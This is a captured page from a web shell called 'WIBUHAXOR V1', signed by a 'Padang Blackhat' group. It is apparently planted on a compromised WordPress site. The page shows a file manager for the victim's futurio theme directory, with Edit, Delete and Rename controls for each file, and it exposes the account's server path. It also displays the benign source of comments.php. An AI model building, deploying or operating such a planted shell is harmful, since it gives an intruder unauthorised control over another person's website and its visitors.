-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
public_html
/
wp-content
/
themes
/
futurio
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
css
--
NONE
fonts
--
NONE
img
--
NONE
js
--
NONE
languages
--
NONE
lib
--
NONE
template-parts
--
NONE
.htaccess
0.231KB
Edit File
Delete File
Rename
404.php
2.043KB
Edit File
Delete File
Rename
archive.php
1.247KB
Edit File
Delete File
Rename
comments.php
2.249KB
Edit File
Delete File
Rename
content-none.php
0.898KB
Edit File
Delete File
Rename
content.php
1.271KB
Edit File
Delete File
Rename
footer.php
0.979KB
Edit File
Delete File
Rename
functions.php
24.595KB
Edit File
Delete File
Rename
header.php
0.53KB
Edit File
Delete File
Rename
page.php
2.265KB
Edit File
Delete File
Rename
rtl.css
24.53KB
Edit File
Delete File
Rename
screenshot.png
230.537KB
Edit File
Delete File
Rename
search.php
1.067KB
Edit File
Delete File
Rename
sidebar-woo.php
0.698KB
Edit File
Delete File
Rename
sidebar.php
0.54KB
Edit File
Delete File
Rename
single-elementor_library.php
1.118KB
Edit File
Delete File
Rename
single.php
4.287KB
Edit File
Delete File
Rename
style.css
40.124KB
Edit File
Delete File
Rename
woocommerce.php
0.551KB
Edit File
Delete File
Rename
wpml-config.xml
0.341KB
Edit File
Delete File
Rename
<?php /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if (post_password_required()) { return; } if (is_single() || is_page()) : ?> <div id="comments" class="comments-template"> <?php if (have_comments()) : ?> <h4 id="comments"> <?php $comments_number = get_comments_number(); if ('1' === $comments_number) { /* translators: %s: post title */ printf(esc_html_x('One thought on “%s”', 'comments title', 'futurio'), esc_html(get_the_title())); } else { printf( /* translators: 1: number of comments, 2: post title */ esc_html(_nx( '%1$s thought on “%2$s”', '%1$s thoughts on “%2$s”', $comments_number, 'comments title', 'futurio' )), esc_html(number_format_i18n($comments_number)), esc_html(get_the_title()) ); } ?> </h4> <ul class="commentlist list-unstyled"> <?php wp_list_comments(); paginate_comments_links(); if (is_singular()) { wp_enqueue_script('comment-reply'); } ?> </ul> <?php comment_form(); else : if (comments_open()) : comment_form(); endif; endif; // If comments are closed and there are comments, let's leave a little note, shall we? if (!comments_open() && get_comments_number() && post_type_supports(get_post_type(), 'comments')) : ?> <p class="no-comments"><?php esc_html_e('Comments are closed.', 'futurio'); ?></p> <?php endif; ?> </div> <?php endif;
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat